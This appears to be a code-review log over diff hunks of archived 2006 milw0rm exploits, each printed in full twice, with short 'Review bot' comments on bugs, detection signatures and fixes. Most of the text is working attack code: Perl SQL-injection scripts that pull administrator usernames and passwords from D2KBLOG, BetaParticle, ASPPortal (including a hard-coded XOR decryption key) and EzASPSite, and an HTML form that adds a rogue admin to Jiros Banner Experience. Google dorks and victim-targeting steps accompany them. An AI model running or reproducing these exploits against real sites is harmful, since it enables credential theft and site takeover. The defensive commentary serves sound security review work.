print $cilem "Host: $cilemserver\n";
print $cilem "Accept: */*\n";
print $cilem "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$cilem>) {
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
print "+ Exploit succeed! Getting admin's information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /(.*?)<\/font><\/td>/) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-03-07]
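Review bot: the password check `if ($answer =~ /(.*?)<\/font><\/td>/)` has no anchoring text before the capture, so it matches the first line anywhere in the response that contains `</font></td>`, prints whatever preceded it as `PASSWORD:` and then calls `exit()`; on a page with such a cell before the injected row the script exits on unrelated markup and the username branch is never reached. The username regex `/font-weight:700\">(.*?)<\/b><\/td>/` is only slightly more specific. In the query string, `where%20admin=admin` compares the column with itself, which is true for every non-NULL row, so the clause filters nothing. The request line `GET $cilemreq\n` has the same missing-HTTP-version problem noted on the Pentacle script above. For detection, the stable tokens are `yazdir.asp?haber_id=` followed by `%20union%20select%20` and `from%20ayarlar`; on the application side `haber_id` is an integer and a parameterized lookup removes the vulnerability.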


@ -1,55 +1,55 @@
#!/usr/bin/perl -w
# D2KBLOG SQL injection
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)
require LWP::UserAgent;
require HTTP::Request;
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n";
if (@ARGV != 2)
{
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
exit ();
}
my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);
my $Path = $ARGV[0];
my $Page = $ARGV[1];
my $URL = "http://".$Path.$Page;
print "|***| Connecting to ".$URL." ...\r\n";
$r = HTTP::Request->new(GET => $URL."?action=edit");
$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );
$res = $ua->request($r);
print "|***| Connected !\r\n";
if ($res->is_success) {
print "|***| Extracting Username and Password ...\r\n\r\n";
my $results = $res->content;
while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }
print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n";
} else {
die "\r\n|***| ".$res->status_line;
}
# milw0rm.com [2006-03-09]
#!/usr/bin/perl -w
# D2KBLOG SQL injection
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)
require LWP::UserAgent;
require HTTP::Request;
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n";
if (@ARGV != 2)
{
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
exit ();
}
my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);
my $Path = $ARGV[0];
my $Page = $ARGV[1];
my $URL = "http://".$Path.$Page;
print "|***| Connecting to ".$URL." ...\r\n";
$r = HTTP::Request->new(GET => $URL."?action=edit");
$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );
$res = $ua->request($r);
print "|***| Connected !\r\n";
if ($res->is_success) {
print "|***| Extracting Username and Password ...\r\n\r\n";
my $results = $res->content;
while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }
print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n";
} else {
die "\r\n|***| ".$res->status_line;
}
# milw0rm.com [2006-03-09]
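Review bot: the injection here travels in the `Cookie` header (`memName=<!--'UNION%20ALL%20select ...`), not in the query string, and that is the point a defender should take from this hunk: filtering on the request line or `GET` parameters alone will not see it, and `profile.asp` has to treat cookie values as untrusted input exactly like form fields, ideally by binding `memName` as a query parameter rather than concatenating it. In the script itself, `print "|***| Connected !\r\n";` is emitted before `$res->is_success` is checked, so a refused or failed request still prints "Connected"; `$r` and `$res` are package globals because there is no `my` (and `-w` does not imply `use strict;`); and the cookie value mixes raw `<`, `>`, `'` and `|` characters with `%20`/`%2b` encoding, which only works because the server does not validate cookie syntax. The `\n\r\n` line endings in the usage messages are inconsistent with the `\r\n` used everywhere else.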


@ -1,57 +1,57 @@
<html>
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
<body bgcolor="#000000">
<style>
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
</style>
<script language="JavaScript">
function jbxpl() {
if (document.xplt.victim.value=="") {
alert("Please enter site!");
return false;
}
if (confirm("Are you sure?")) {
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
xplt.aName.value=document.xplt.aName.value;
xplt.aEmail.value=document.xplt.aEmail.value;
xplt.aPassword.value=document.xplt.aPassword.value;
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
xplt.aIsActive=document.xplt.aIsActive.value;
xplt.submit();
}
}
</script>
<strong>
<font class="xpl" color="#00FF40">
<pre>
<center>
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=19
Dork for this exploit: <u>inurl:JBSPro</u>
Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
For second example your target must be www.victim.com/
You can login with your admin account via www.victim.com/JBSPath/files/login.asp
Have phun
<form name="xplt" method="POST" onsubmit="jbxpl();">
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
<input type="hidden" name="aIsSystemAdmin" value="True">
<input type="hidden" name="aIsActive" value="True">
<input type="submit" value="Send" class="xpl">
</form>
</pre>
</font>
</strong>
</body>
</html>
Save this code as .htm and then execute.
# nukedx.com [2006-03-07]
# milw0rm.com [2006-03-09]
<html>
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
<body bgcolor="#000000">
<style>
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
</style>
<script language="JavaScript">
function jbxpl() {
if (document.xplt.victim.value=="") {
alert("Please enter site!");
return false;
}
if (confirm("Are you sure?")) {
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
xplt.aName.value=document.xplt.aName.value;
xplt.aEmail.value=document.xplt.aEmail.value;
xplt.aPassword.value=document.xplt.aPassword.value;
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
xplt.aIsActive=document.xplt.aIsActive.value;
xplt.submit();
}
}
</script>
<strong>
<font class="xpl" color="#00FF40">
<pre>
<center>
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=19
Dork for this exploit: <u>inurl:JBSPro</u>
Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
For second example your target must be www.victim.com/
You can login with your admin account via www.victim.com/JBSPath/files/login.asp
Have phun
<form name="xplt" method="POST" onsubmit="jbxpl();">
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
<input type="hidden" name="aIsSystemAdmin" value="True">
<input type="hidden" name="aIsActive" value="True">
<input type="submit" value="Send" class="xpl">
</form>
</pre>
</font>
</strong>
</body>
</html>
Save this code as .htm and then execute.
# nukedx.com [2006-03-07]
# milw0rm.com [2006-03-09]
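Review bot: `xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;` and the `aIsActive` line below it assign a string to the form's element property instead of to the element's `.value`, unlike the three lines above them that correctly use `.value`; the submission is unaffected only because the hidden inputs already hold `True`, so the two statements are no-ops for their stated purpose. As in the Pentacle HTML, `onsubmit="jbxpl();"` ignores the function's return value, so `return false;` does not stop a submit with an empty target, and because the `<form>` has no `action` attribute the page then posts to itself. `<center>` is opened and never closed, and the target must end with `/` only because the script concatenates `"files/update.asp?Action=AddAdmin"` without inserting one. The weakness this demonstrates is an unauthenticated state-changing endpoint: `files/update.asp?Action=AddAdmin` accepts a POST that creates a system administrator. The server-side fix is to check the caller's session and admin role before processing `AddAdmin`, and a per-session CSRF token stops the same request from being forged from a third-party page such as this one.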


@ -1,67 +1,67 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=20
#Usage: beta.pl <host> <path>
#googledork: [ "Powered by bp blog" ] 9.710 pages..
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-20\r\n";
print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to BetaParticle ex: /blog\r\n";
exit();
}
sub exploit () {
#Our variables...
$bpserver = $ARGV[0];
$bpserver =~ s/(http:\/\/)//eg;
$bphost = "http://".$bpserver;
$bpdir = $ARGV[1];
$bpport = "80";
$bptar = "template_gallery_detail.asp?fldGalleryID=";
$bpfinal = "main.asp";
$bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1";
$bpreq = $bphost.$bpdir.$bptar.$bpxp;
#Sending data...
header();
print "- Trying to connect: $bpserver\r\n";
$bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n";
print $bp "GET $bpreq HTTP/1.1\n";
print $bp "Accept: */*\n";
print $bp "Referer: $bphost\n";
print $bp "Accept-Language: tr\n";
print $bp "User-Agent: NukeZilla 4.3\n";
print $bp "Cache-Control: no-cache\n";
print $bp "Host: $bpserver\n";
print $bp "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$bp>) {
if ($answer =~ /<h3>(.*?)<\/h3>/) {
print "- Exploit succeed! Getting admin's information\r\n";
print "- Username: $1\r\n";
}
if ($answer =~ /<p>(.*?)<\/p>/) {
print "- Password: $1\r\n";
print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n";
exit();
}
if ($answer =~ /number of columns/) {
print "- This version of BetaParticle is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
print "- Exploit failed\n"
}
# milw0rm.com [2006-03-18]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=20
#Usage: beta.pl <host> <path>
#googledork: [ "Powered by bp blog" ] 9.710 pages..
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-20\r\n";
print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to BetaParticle ex: /blog\r\n";
exit();
}
sub exploit () {
#Our variables...
$bpserver = $ARGV[0];
$bpserver =~ s/(http:\/\/)//eg;
$bphost = "http://".$bpserver;
$bpdir = $ARGV[1];
$bpport = "80";
$bptar = "template_gallery_detail.asp?fldGalleryID=";
$bpfinal = "main.asp";
$bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1";
$bpreq = $bphost.$bpdir.$bptar.$bpxp;
#Sending data...
header();
print "- Trying to connect: $bpserver\r\n";
$bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n";
print $bp "GET $bpreq HTTP/1.1\n";
print $bp "Accept: */*\n";
print $bp "Referer: $bphost\n";
print $bp "Accept-Language: tr\n";
print $bp "User-Agent: NukeZilla 4.3\n";
print $bp "Cache-Control: no-cache\n";
print $bp "Host: $bpserver\n";
print $bp "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$bp>) {
if ($answer =~ /<h3>(.*?)<\/h3>/) {
print "- Exploit succeed! Getting admin's information\r\n";
print "- Username: $1\r\n";
}
if ($answer =~ /<p>(.*?)<\/p>/) {
print "- Password: $1\r\n";
print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n";
exit();
}
if ($answer =~ /number of columns/) {
print "- This version of BetaParticle is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
print "- Exploit failed\n"
}
# milw0rm.com [2006-03-18]
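Review bot: both response checks are too generic to be reliable: `/<h3>(.*?)<\/h3>/` and `/<p>(.*?)<\/p>/` match the first heading and paragraph on any line of the page, so "Username" and "Password" are printed from whatever `<h3>` and `<p>` appear first, and the `exit()` in the `<p>` branch fires before the injected row if any paragraph precedes it; the Pentacle script at least anchors on a specific `class=` attribute. `sub exploit () {` declares an empty prototype but is called in `else { exploit(); }` before that declaration, which Perl reports as "called too early to check prototype" under `-w`. The final `print "- Exploit failed\n"` lacks a trailing semicolon; legal as the last statement in a block, but it breaks as soon as a line is added after it. From a detection standpoint the hard-coded `User-Agent: NukeZilla 4.3`, `Accept-Language: tr` and the `fldGalleryID=-1+UNION+SELECT` query string are all stable signatures; on the application side `fldGalleryID` is an integer and should be validated and bound as one.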


@ -1,87 +1,87 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=21
#Usage: aspp.pl <host> <path> <user>
use IO::Socket;
use Math::BigInt;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-21\r\n";
print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPPortal ex: /portal/\r\n";
print "- <user> -> Username that you want password. ex: admin\r\n";
exit();
}
sub decrypt ()
{
$lp = length($appass);
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";
if ($lp == 0) { die("- An error occurued\r\n"); }
for ($i = 0; $i < $lp ; $i++) {
$f = $lp - $i - 1; # Formula for getting character via substr...
$n = substr($apkey,$f,1);
$l = substr($appass,$f,1);
$appwd = chr(ord($n)^ord($l)).$appwd;
}
print "- Password decrypted as: $appwd\r\n";
print "- Lets go $aphost$apdir$apfinal for login\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$apserver = $ARGV[0];
$apserver =~ s/(http:\/\/)//eg;
$aphost = "http://".$apserver;
$apdir = $ARGV[1];
$apport = "80";
$aptar = "content/downloads/download_click.asp?downloadid=";
$apfinal = "content/users/login.asp";
$apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'";
$apreq = $aphost.$apdir.$aptar.$apxp;
#Sending data...
header();
print "- Trying to connect: $apserver\r\n";
$ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n";
print $ap "GET $apreq HTTP/1.1\n";
print $ap "Accept: */*\n";
print $ap "Referer: $aphost\n";
print $ap "Accept-Language: tr\n";
print $ap "User-Agent: NukeZilla\n";
print $ap "Cache-Control: no-cache\n";
print $ap "Host: $apserver\n";
print $ap "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$ap>) {
if ($answer =~ /string: &quot;(.*?)&quot;]'/) {
print "- Exploit succeed! Getting $ARGV[2]'s information\r\n";
print "- Username: $ARGV[2]\r\n";
print "- Decrypting password....\r\n";
$appass = $1;
$appass =~ s/(&quot;)/chr(34)/eg;
$appass =~ s/(&lt;)/chr(60)/eg;
$appass =~ s/(&gt;)/chr(62)/eg;
$appass =~ s/(&nbsp;)/chr(32)/eg;
decrypt();
}
if ($answer =~ /number of columns/) {
print "- This version of ASPPortal is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
# milw0rm.com [2006-03-20]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=21
#Usage: aspp.pl <host> <path> <user>
use IO::Socket;
use Math::BigInt;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-21\r\n";
print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPPortal ex: /portal/\r\n";
print "- <user> -> Username that you want password. ex: admin\r\n";
exit();
}
sub decrypt ()
{
$lp = length($appass);
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";
if ($lp == 0) { die("- An error occurued\r\n"); }
for ($i = 0; $i < $lp ; $i++) {
$f = $lp - $i - 1; # Formula for getting character via substr...
$n = substr($apkey,$f,1);
$l = substr($appass,$f,1);
$appwd = chr(ord($n)^ord($l)).$appwd;
}
print "- Password decrypted as: $appwd\r\n";
print "- Lets go $aphost$apdir$apfinal for login\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$apserver = $ARGV[0];
$apserver =~ s/(http:\/\/)//eg;
$aphost = "http://".$apserver;
$apdir = $ARGV[1];
$apport = "80";
$aptar = "content/downloads/download_click.asp?downloadid=";
$apfinal = "content/users/login.asp";
$apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'";
$apreq = $aphost.$apdir.$aptar.$apxp;
#Sending data...
header();
print "- Trying to connect: $apserver\r\n";
$ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n";
print $ap "GET $apreq HTTP/1.1\n";
print $ap "Accept: */*\n";
print $ap "Referer: $aphost\n";
print $ap "Accept-Language: tr\n";
print $ap "User-Agent: NukeZilla\n";
print $ap "Cache-Control: no-cache\n";
print $ap "Host: $apserver\n";
print $ap "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$ap>) {
if ($answer =~ /string: &quot;(.*?)&quot;]'/) {
print "- Exploit succeed! Getting $ARGV[2]'s information\r\n";
print "- Username: $ARGV[2]\r\n";
print "- Decrypting password....\r\n";
$appass = $1;
$appass =~ s/(&quot;)/chr(34)/eg;
$appass =~ s/(&lt;)/chr(60)/eg;
$appass =~ s/(&gt;)/chr(62)/eg;
$appass =~ s/(&nbsp;)/chr(32)/eg;
decrypt();
}
if ($answer =~ /number of columns/) {
print "- This version of ASPPortal is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
# milw0rm.com [2006-03-20]
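Review bot: the `use Math::BigInt;` import is never referenced anywhere in the script and should be dropped. More relevant for anyone triaging this entry, `decrypt()` recovers the plaintext by XORing each character of the value pulled from the `password` column against the hard-coded `$apkey` string, which shows that ASPPortal stores passwords under a fixed-key XOR rather than a one-way hash; `header()` and the advisory link name only the SQL injection in the `downloadid` parameter of `download_click.asp`, and the remediation guidance should add that stored credentials need proper hashing, because parameterising the query alone leaves every existing password recoverable from any later database exposure. The old and new sides of the hunk are visibly identical, so this looks like a line-ending or whitespace-only rewrite; the commit should say so rather than present it as a content change.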


@ -1,69 +1,69 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=22
#Usage: ezasp.pl <host> <path>
#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages..
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-22\r\n";
print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$ezserver = $ARGV[0];
$ezserver =~ s/(http:\/\/)//eg;
$ezhost = "http://".$ezserver;
$ezdir = $ARGV[1];
$ezport = "80";
$eztar = "Default.asp?Scheme=";
$ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1";
$ezreq = $ezhost.$ezdir.$eztar.$ezxp;
#Sending data...
header();
print "- Trying to connect: $ezserver\r\n";
$ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n";
print $ez "GET $ezreq HTTP/1.1\n";
print $ez "Accept: */*\n";
print $ez "Referer: $ezhost\n";
print $ez "Accept-Language: tr\n";
print $ez "User-Agent: NukeZilla\n";
print $ez "Cache-Control: no-cache\n";
print $ez "Host: $ezserver\n";
print $ez "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$ez>) {
if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) {
print "- Exploit succeed! Getting admin's information\r\n";
print "- USERNAME: $1\r\n";
}
if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) {
print "- SHA1 HASH of PASSWORD: $1\r\n";
exit();
}
if ($answer =~ /number of columns/) {
print "- This version of EzASPSite is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
# nukedx.com [2006-03-29]
# milw0rm.com [2006-03-29]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=22
#Usage: ezasp.pl <host> <path>
#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages..
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-22\r\n";
print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$ezserver = $ARGV[0];
$ezserver =~ s/(http:\/\/)//eg;
$ezhost = "http://".$ezserver;
$ezdir = $ARGV[1];
$ezport = "80";
$eztar = "Default.asp?Scheme=";
$ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1";
$ezreq = $ezhost.$ezdir.$eztar.$ezxp;
#Sending data...
header();
print "- Trying to connect: $ezserver\r\n";
$ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n";
print $ez "GET $ezreq HTTP/1.1\n";
print $ez "Accept: */*\n";
print $ez "Referer: $ezhost\n";
print $ez "Accept-Language: tr\n";
print $ez "User-Agent: NukeZilla\n";
print $ez "Cache-Control: no-cache\n";
print $ez "Host: $ezserver\n";
print $ez "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$ez>) {
if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) {
print "- Exploit succeed! Getting admin's information\r\n";
print "- USERNAME: $1\r\n";
}
if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) {
print "- SHA1 HASH of PASSWORD: $1\r\n";
exit();
}
if ($answer =~ /number of columns/) {
print "- This version of EzASPSite is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
# nukedx.com [2006-03-29]
# milw0rm.com [2006-03-29]
